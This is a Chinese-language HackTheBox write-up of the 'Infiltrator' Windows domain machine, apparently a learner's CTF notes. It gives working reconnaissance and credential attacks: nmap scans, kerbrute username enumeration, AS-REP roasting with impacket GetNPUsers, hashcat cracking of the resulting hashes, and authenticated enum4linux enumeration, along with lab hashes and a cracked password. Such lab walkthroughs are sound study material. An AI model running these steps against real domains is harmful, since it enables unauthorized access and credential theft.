HacktheBox-Infiltrator

前言

这周活太密了，趁还剩一天赶紧把这个打了，这 Windows 域渗透我也不会啊我去😡。

这个难度无愧于这个 INSANE，这篇 90%都是复现，最后的 PE 部分还每太整明白，后面如果有机会的话补充一下，并且总结下思路。

我这个是一点域渗透的基础也没有的学习，所以有些地方理解可能有问题，请大家一定要指出方便修改！！！

信息搜集

start infoscan
10.10.11.31:80 open
10.10.11.31:88 open
10.10.11.31:445 open
10.10.11.31:139 open
10.10.11.31:135 open
[*] alive ports len is: 5
start vulscan
[*] WebTitle http://10.10.11.31        code:200 len:31235  title:Infiltrator.htb
[*] NetInfo 
[*]10.10.11.31
   [->]dc01
   [->]10.10.11.31

nmap -sSVC infiltrator.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 15:14 CST
Nmap scan report for infiltrator.htb (10.10.11.31)
Host is up (0.073s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Infiltrator.htb
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-05 07:04:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
|_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
|_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time.
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Not valid before: 2024-07-30T13:20:17
|_Not valid after:  2025-01-29T13:20:17
| rdp-ntlm-info: 
|   Target_Name: INFILTRATOR
|   NetBIOS_Domain_Name: INFILTRATOR
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: infiltrator.htb
|   DNS_Computer_Name: dc01.infiltrator.htb
|   DNS_Tree_Name: infiltrator.htb
|   Product_Version: 10.0.17763
|_  System_Time: 2024-09-05T07:04:55+00:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -10m04s, deviation: 0s, median: -10m05s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-09-05T07:04:58
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.29 seconds

未授权

139,445 - Pentesting SMB | HackTricks

开放了 139 和 445 端口，可能存在 smb 漏洞。

enum4linux -a infiltrator.htb

查看是否存在信息泄露。

看来是没有。

SMB 爆破

网站主页展示了员工的信息，在 console 批量提取一下。

document.querySelectorAll('.author-item h4').forEach(e => console.log(e.textContent))
.01 David Anderson debugger eval code:1:67
.02 Olivia Martinez debugger eval code:1:67
.03 Kevin Turner debugger eval code:1:67
.04 Amanda Walker debugger eval code:1:67
.05 Marcus Harris debugger eval code:1:67
.06 Lauren Clark debugger eval code:1:67
.07 Ethan Rodriguez debugger eval code:1:67

根据用户名生成一段邮箱字典：

David_Anderson@infiltrator.htb
Olivia_Martinez@infiltrator.htb
Kevin_Turner@infiltrator.htb
Amanda_Walker@infiltrator.htb
Marcus_Harris@infiltrator.htb
Lauren_Clark@infiltrator.htb
Ethan_Rodriguez@infiltrator.htb
D.Anderson@infiltrator.htb
O.Martinez@infiltrator.htb
K.Turner@infiltrator.htb
A.Walker@infiltrator.htb
M.Harris@infiltrator.htb
L.Clark@infiltrator.htb
E.Rodriguez@infiltrator.htb
David.Anderson@infiltrator.htb
Olivia.Martinez@infiltrator.htb
Kevin.Turner@infiltrator.htb
Amanda.Walker@infiltrator.htb
Marcus.Harris@infiltrator.htb
Lauren.Clark@infiltrator.htb
Ethan.Rodriguez@infiltrator.htb
D_Anderson@infiltrator.htb
O_Martinez@infiltrator.htb
K_Turner@infiltrator.htb
A_Walker@infiltrator.htb
M_Harris@infiltrator.htb
L_Clark@infiltrator.htb
E_Rodriguez@infiltrator.htb

kerbrute 爆破：

GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcing

./kerbrute userenum -d "infiltrator.htb" '/home/kali/桌面/weapon/Infiltrator/email.txt' --dc "dc01.infiltrator.htb"

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/05/24 - Ronnie Flathers @ropnop

2024/09/05 15:54:11 >  Using KDC(s):
2024/09/05 15:54:11 >   dc01.infiltrator.htb:88
2024/09/05 15:54:11 >  [+] VALID USERNAME:       d.anderson@infiltrator.htb                                                                   
2024/09/05 15:54:11 >  [+] VALID USERNAME:       o.martinez@infiltrator.htb                                                                   
2024/09/05 15:54:11 >  [+] VALID USERNAME:       k.turner@infiltrator.htb                                                                     
2024/09/05 15:54:12 >  [+] VALID USERNAME:       a.walker@infiltrator.htb                                                                     
2024/09/05 15:54:12 >  [+] VALID USERNAME:       e.rodriguez@infiltrator.htb                                                                  
2024/09/05 15:54:12 >  [+] VALID USERNAME:       m.harris@infiltrator.htb                                                                     
2024/09/05 15:54:12 >  [+] VALID USERNAME:       L.Clark@infiltrator.htb                                                                      
2024/09/05 15:54:12 >  [+] VALID USERNAME:       l.clark@infiltrator.htb                                                                      

先通过这种方式爆破出存在的用户名，再使用 GetNPUsers 爆破出不需要 kerberos 预身份验证的用户。

使用 impacket 的 GetNPUsers 模块，没安装可以先安装：

sudo apt install python3-impacket

Impacket脚本利用指南（上）

查询域内哪些用户不需要Kerberos预身份认证，只需要任意一个域用户即可利用，只要有用户不需要Kerberos预身份认证，可以获取其AS_REQ拿来爆破其密码。

/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.12.0', 'GetNPUsers.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User D.Anderson@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User O.Martinez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User K.Turner@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User A.Walker@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User M.Harris@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$L.Clark@infiltrator.htb@INFILTRATOR.HTB:d2b6127bdd253a8a6ea3a0bb86a3c816$4e7096e0a6ba8409033c25edbee6187609209b76a6c7beef2f398abaca8c66f74cb0cf05523b3f2cd97e9e01774ddde4d2aeb62289f7ca692f5c69000b872ee270056573b8dfb37508c8821243f5043d5139770dfbb276276078f55fc8412f70103cf0877aa5df36da60ce44d09c1ea5b6b898f14cc1bac2952061616359b02d02209730df4f6a995e75c7e17955983c13d53989855cffe18a641007c6378e622c8bdb6c1b5f6b597a2af6726aa14f631fdd79d8bf70fc989c09ad9b6ccdbc4baf6313414a863661a5546cb3c0308044aca3b2426d8af6f0b9ffbd2b875c372339755eb5086ff54ca56870e7ce0533587317
[-] User E.Rodriguez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User d.anderson@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User o.martinez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User k.turner@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.walker@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.harris@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:29a707b0d8f8b993355bcfa7a6b9bf70$b229a3fd6ff41bc50682fed30a35e19bc4b7a013c3398873cbe184fb5b6f155a1a9fb725ae126572532fbde8486aaa9a9063fd3589441f5406037c4cd20ac94e9cb094dfdc9cd45b770f39272408b10d2cae3eb8d70cc1b47f612d0537805b4b4d48504cd5eab872059ebcf33cd5d7bcd94bc3bdb614de1b9cab4a6842fc974b74c4c997913d4764f8e1cbb11211d5d6f9d3a1d8fbf317e0979d44ea756974aa09fcbbc925b0926d0194c99c948f418ff65538cdfef8f7ea1d884849b1f4a280fbb9fdf2e35d3e9343b15f675e7ebc6f849e73c0e4d5131b10023d63b247cac1ba0ebff9065737f49ba1b6598fe818c4f15b
[-] User e.rodriguez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set

然后保存后用 hashcat 爆破：

hashcat -m 18200 hash.txt -a 0 /usr/share/wordlists/rockyou.txt
$krb5asrep$23$L.Clark@INFILTRATOR.HTB:91b31699739dc68da0f756ab47b3b4f9$3abfb3e84a112e58d37a3a9e4c0352546c79ac2649721440f8116723102c023cc33428e0fe41d2d544effa4b79b8bf674637a9f51c23c19c2662214295ff3bfee8411c78637c8de39a15681e8a0c262c0359a420ab04e587bf208c693fe60d1b0f3ef3c289457cc23f4662c3a2aef77316ab0bc15240b9b1fa154e8e66373b1086a9265a2cd21ee1fafb83691c9ca638c0188289ffa0a4d8f6cf2b581d9f50c2c399be0167fe9a94acc02bf545e759248ec4ee351feff8417353d61068e87e9e2e57dca9b9b1253fb9b0b198204d87ec81daab924729c199d7a2c225d90fb0f85891a3b460f373a5154a008545d3149df1a8:WAT?watismypass!

WAT?watismypass!

用跑出来的账户密码再跑一次enum4linux

Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep  5 16:20:57 2024

 =========================================( Target Information )=========================================                                     
                                                                       
Target ........... 10.10.11.31                                         
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... 'WAT?watismypass!'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.11.31 )============================                                      
                                                                       
                                                                       
[E] Can't find workgroup/domain                                        
                                                                       
                                                                       

 ====================================( Session Check on 10.10.11.31 )====================================                                     
                                                                       
                                                                       
[E] Server doesn't allow session using username '', password 'WAT?watismypass!'.  Aborting remainder of tests.                                
                                                                       
                                                                       
┌──(root㉿kali)-[/home/…/桌面/weapon/windows/AD]
└─# enum4linux -U -p 'WAT?watismypass!' infiltrator.htb
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep  5 16:21:58 2024

 =========================================( Target Information )=========================================                                     
                                                                       
Target ........... infiltrator.htb                                     
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... 'WAT?watismypass!'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==========================( Enumerating Workgroup/Domain on infiltrator.htb )==========================                                      
                                                                       
                                                                       
[E] Can't find workgroup/domain                                        
                                                                       
                                                                       

 ==================================( Session Check on infiltrator.htb )==================================                                     
                                                                       
                                                                       
[E] Server doesn't allow session using username '', password 'WAT?watismypass!'.  Aborting remainder of tests.                                
                                                                       
                                                                       
┌──(root㉿kali)-[/home/…/桌面/weapon/windows/AD]
└─# enum4linux -a -u /home/kali/桌面/weapon/Infiltrator/email.txt  -p 'WAT?watismypass!' infiltrator.htb 
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep  5 16:26:39 2024

 =========================================( Target Information )=========================================                                     
                                                                       
Target ........... infiltrator.htb                                     
RID Range ........ 500-550,1000-1050
Username ......... '/home/kali/桌面/weapon/Infiltrator/email.txt'
Password ......... 'WAT?watismypass!'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==========================( Enumerating Workgroup/Domain on infiltrator.htb )==========================                                      
                                                                       
                                                                       
[E] Can't find workgroup/domain                                        
                                                                       
                                                                       

 ==============================( Nbtstat Information for infiltrator.htb )==============================                                      
                                                                       
Looking up status of 10.10.11.31                                       
No reply from 10.10.11.31

 ==================================( Session Check on infiltrator.htb )==================================                                     
                                                                       
                                                                       
[E] Server doesn't allow session using username '/home/kali/桌面/weapon/Infiltrator/email.txt', password 'WAT?watismypass!'.  Aborting remainder of tests.                                                           
                                                                       
                                                                       
┌──(root㉿kali)-[/home/…/桌面/weapon/windows/AD]
└─# enum4linux -a -u 'l.clark' -p 'WAT?watismypass!' infiltrator.htb
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep  5 16:30:09 2024

 =========================================( Target Information )=========================================                                     
                                                                       
Target ........... infiltrator.htb                                     
RID Range ........ 500-550,1000-1050
Username ......... 'l.clark'
Password ......... 'WAT?watismypass!'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==========================( Enumerating Workgroup/Domain on infiltrator.htb )==========================                                      
                                                                       
                                                                       
[E] Can't find workgroup/domain                                        
                                                                       
                                                                       

 ==============================( Nbtstat Information for infiltrator.htb )==============================                                      
                                                                       
Looking up status of 10.10.11.31                                       
No reply from 10.10.11.31

 ==================================( Session Check on infiltrator.htb )==================================                                     
                                                                       
                                                                       
[+] Server infiltrator.htb allows sessions using username 'l.clark', password 'WAT?watismypass!'                                              
                                                                       
                                                                       
 ===============================( Getting domain SID for infiltrator.htb )===============================                                     
                                                                       
Domain Name: INFILTRATOR                                               
Domain Sid: S-1-5-21-2606098828-3734741516-3625406802

[+] Host is part of a domain (not a workgroup)                         
                                                                       
                                                                       
 =================================( OS information on infiltrator.htb )=================================                                      
                                                                       
                                                                       
[E] Can't get OS info with smbclient                                   
                                                                       
                                                                       
[+] Got OS info for infiltrator.htb from srvinfo:                      
        INFILTRATOR.HTBWk Sv PDC Tim NT                                
        platform_id     :       500
        os version      :       10.0
        server type     :       0x80102b


 ======================================( Users on infiltrator.htb )======================================                                     
                                                                       
index: 0xfb5 RID: 0x453 acb: 0x00000210 Account: A.walker       Name: (null)   Desc: (null)
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)   Desc: Built-in account for administering the computer/domain
index: 0xfb1 RID: 0x44f acb: 0x00000210 Account: D.anderson     Name: (null)   Desc: (null)
index: 0xfb7 RID: 0x455 acb: 0x00000210 Account: E.rodriguez    Name: (null)   Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)  Desc: Built-in account for guest access to the computer/domain
index: 0xfb6 RID: 0x454 acb: 0x00000210 Account: K.turner       Name: (null)   Desc: MessengerApp@Pass!
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)  Desc: Key Distribution Center Service Account
index: 0xfb2 RID: 0x450 acb: 0x00010210 Account: L.clark        Name: (null)   Desc: (null)
index: 0x1312 RID: 0x1fa5 acb: 0x00000210 Account: lan_managment      Name: lan_managment      Desc: (null)
index: 0xfb3 RID: 0x451 acb: 0x00000210 Account: M.harris       Name: (null)   Desc: (null)
index: 0xfb4 RID: 0x452 acb: 0x00000210 Account: O.martinez     Name: (null)   Desc: (null)
index: 0xfc1 RID: 0x641 acb: 0x00000210 Account: winrm_svc      Name: (null)   Desc: (null)

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[D.anderson] rid:[0x44f]
user:[L.clark] rid:[0x450]
user:[M.harris] rid:[0x451]
user:[O.martinez] rid:[0x452]
user:[A.walker] rid:[0x453]
user:[K.turner] rid:[0x454]
user:[E.rodriguez] rid:[0x455]
user:[winrm_svc] rid:[0x641]
user:[lan_managment] rid:[0x1fa5]

 ================================( Share Enumeration on infiltrator.htb )================================                                     
                                                                       
do_connect: Connection to infiltrator.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on infiltrator.htb                        
                                                                       
//infiltrator.htb/ADMIN$        Mapping: DENIED Listing: N/A Writing: N/A
//infiltrator.htb/C$    Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:                                         
                                                                       
NT_STATUS_NO_SUCH_FILE listing \*                                      
//infiltrator.htb/IPC$  Mapping: N/A Listing: N/A Writing: N/A
//infiltrator.htb/NETLOGON      Mapping: OK Listing: OK Writing: N/A
//infiltrator.htb/SYSVOL        Mapping: OK Listing: OK Writing: N/A

 ==========================( Password Policy Information for infiltrator.htb )==========================                                      
                                                                       
                                                                       

[+] Attaching to infiltrator.htb using l.clark:WAT?watismypass!

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:INFILTRATOR.HTB)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

        [+] INFILTRATOR
        [+] Builtin

[+] Password Info for Domain: INFILTRATOR

        [+] Minimum password length: 7
        [+] Password history length: 24
        [+] Maximum password age: 41 days 23 hours 53 minutes 
        [+] Password Complexity Flags: 000001

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 1

        [+] Minimum password age: 1 day 4 minutes 
        [+] Reset Account Lockout Counter: 10 minutes 
        [+] Locked Account Duration: 10 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set



[+] Retieved partial password policy with rpcclient:                   
                                                                       
                                                                       
Password Complexity: Enabled                                           
Minimum Password Length: 7


 =====================================( Groups on infiltrator.htb )=====================================                                      
                                                                       
                                                                       
[+] Getting builtin groups:                                            
                                                                       
group:[Server Operators] rid:[0x225]                                   
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]

[+]  Getting builtin group memberships:                                
                                                                       
Group: Certificate Service DCOM Access' (RID: 574) has member: NT AUTHORITY\Authenticated Users
Group: Administrators' (RID: 544) has member: INFILTRATOR\Administrator
Group: Administrators' (RID: 544) has member: INFILTRATOR\Enterprise Admins
Group: Administrators' (RID: 544) has member: INFILTRATOR\Domain Admins
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: INFILTRATOR\Domain Users
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: INFILTRATOR\DC01$
Group: Guests' (RID: 546) has member: INFILTRATOR\Guest
Group: Guests' (RID: 546) has member: INFILTRATOR\Domain Guests
Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Group: Remote Desktop Users' (RID: 555) has member: INFILTRATOR\O.martinez
Group: Remote Management Users' (RID: 580) has member: INFILTRATOR\Administrator
Group: Remote Management Users' (RID: 580) has member: INFILTRATOR\M.harris
Group: Remote Management Users' (RID: 580) has member: INFILTRATOR\winrm_svc

[+]  Getting local groups:                                             
                                                                       
group:[Cert Publishers] rid:[0x205]                                    
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+]  Getting local group memberships:                                  
                                                                       
Group: Cert Publishers' (RID: 517) has member: INFILTRATOR\DC01$       
Group: Denied RODC Password Replication Group' (RID: 572) has member: INFILTRATOR\krbtgt
Group: Denied RODC Password Replication Group' (RID: 572) has member: INFILTRATOR\Domain Controllers
Group: Denied RODC Password Replication Group' (RID: 572) has member: INFILTRATOR\Schema Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: INFILTRATOR\Enterprise Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: INFILTRATOR\Cert Publishers
Group: Denied RODC Password Replication Group' (RID: 572) has member: INFILTRATOR\Domain Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: INFILTRATOR\Group Policy Creator Owners
Group: Denied RODC Password Replication Group' (RID: 572) has member: INFILTRATOR\Read-only Domain Controllers

[+]  Getting domain groups:                                            
                                                                       
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]            
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Chiefs Marketing] rid:[0x457]
group:[Developers] rid:[0x458]
group:[Digital_Influencers] rid:[0x459]
group:[Infiltrator_QA] rid:[0x45a]
group:[Marketing_Team] rid:[0x45b]
group:[Service_Management] rid:[0x45c]

[+]  Getting domain group memberships:                                 
                                                                       
Group: 'Domain Admins' (RID: 512) has member: INFILTRATOR\Administrator
Group: 'Schema Admins' (RID: 518) has member: INFILTRATOR\Administrator
Group: 'Infiltrator_QA' (RID: 1114) has member: INFILTRATOR\K.turner
Group: 'Developers' (RID: 1112) has member: INFILTRATOR\M.harris
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\Administrator
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\krbtgt
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\D.anderson
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\L.clark
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\M.harris
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\O.martinez
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\A.walker
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\K.turner
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\E.rodriguez
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\winrm_svc
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\lan_managment
Group: 'Marketing_Team' (RID: 1115) has member: INFILTRATOR\D.anderson
Group: 'Marketing_Team' (RID: 1115) has member: INFILTRATOR\L.clark
Group: 'Domain Computers' (RID: 515) has member: INFILTRATOR\infiltrator_svc$
Group: 'Protected Users' (RID: 525) has member: INFILTRATOR\D.anderson
Group: 'Protected Users' (RID: 525) has member: INFILTRATOR\M.harris
Group: 'Enterprise Admins' (RID: 519) has member: INFILTRATOR\Administrator
Group: 'Chiefs Marketing' (RID: 1111) has member: INFILTRATOR\O.martinez
Group: 'Chiefs Marketing' (RID: 1111) has member: INFILTRATOR\A.walker
Group: 'Domain Guests' (RID: 514) has member: INFILTRATOR\Guest
Group: 'Group Policy Creator Owners' (RID: 520) has member: INFILTRATOR\Administrator
Group: 'Domain Controllers' (RID: 516) has member: INFILTRATOR\DC01$
Group: 'Service_Management' (RID: 1116) has member: INFILTRATOR\winrm_svc
Group: 'Digital_Influencers' (RID: 1113) has member: INFILTRATOR\E.rodriguez

 =================( Users on infiltrator.htb via RID cycling (RIDS: 500-550,1000-1050) )=================                                     
                                                                       
                                                                       
[I] Found new SID:                                                     
S-1-5-21-2606098828-3734741516-3625406802                              

[I] Found new SID:                                                     
S-1-5-21-2606098828-3734741516-3625406802                              

[I] Found new SID:                                                     
S-1-5-32                                                               

[I] Found new SID:                                                     
S-1-5-32                                                               

[I] Found new SID:                                                     
S-1-5-32                                                               

[I] Found new SID:                                                     
S-1-5-32                                                               

[I] Found new SID:                                                     
S-1-5-32                                                               

[I] Found new SID:                                                     
S-1-5-32                                                               

[I] Found new SID:                                                     
S-1-5-32                                                               

[I] Found new SID:                                                     
S-1-5-32                                                               

[I] Found new SID:                                                     
S-1-5-21-2606098828-3734741516-3625406802                              

[I] Found new SID:                                                     
S-1-5-21-2606098828-3734741516-3625406802                              

[+] Enumerating users using SID S-1-5-82-3006700770-424185619-1745488364-794895919 and logon username 'l.clark', password 'WAT?watismypass!'  
                                                                       
                                                                       
[+] Enumerating users using SID S-1-5-32 and logon username 'l.clark', password 'WAT?watismypass!'                                            
                                                                       
S-1-5-32-544 BUILTIN\Administrators (Local Group)                      
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-90 and logon username 'l.clark', password 'WAT?watismypass!'                                            
                                                                       
                                                                       
[+] Enumerating users using SID S-1-5-80-3139157870-2983391045-3678747466-658725712 and logon username 'l.clark', password 'WAT?watismypass!' 
                                                                       
                                                                       
[+] Enumerating users using SID S-1-5-80 and logon username 'l.clark', password 'WAT?watismypass!'                                            
                                                                       
                                                                       
[+] Enumerating users using SID S-1-5-21-3435041394-657642867-1777010750 and logon username 'l.clark', password 'WAT?watismypass!'            
                                                                       
